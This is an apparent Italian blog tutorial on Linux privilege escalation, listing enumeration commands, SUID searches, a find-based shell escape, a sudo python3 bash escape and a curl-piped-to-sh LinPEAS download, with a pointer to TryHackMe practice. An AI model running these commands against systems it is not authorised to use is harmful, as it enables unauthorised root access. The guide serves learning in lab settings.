Il privilege escalation e la fase in cui, ottenuto accesso come utente normale, si cerca di diventare root.
Enumerazione iniziale
uname -a && id && whoami
cat /etc/passwd
ip addr && netstat -tulnp 2>/dev/nullSUID Binaries
find / -perm -4000 2>/dev/null
# Verifica su gtfobins.github.io
find . -exec /bin/sh \; -quitSudo misconfigurations
sudo -l
sudo python3 -c "import os; os.system('/bin/bash')"Cron jobs
cat /etc/crontab
ls -la /etc/cron.*LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shGTFOBins: gtfobins.github.io cataloga binari Unix sfruttabili per privesc.
Conclusione
Il privesc richiede metodologia e pazienza. Pratica su TryHackMe rooms Linux PrivEsc.
💬 Commenti (0)
Nessun commento ancora. Sii il primo!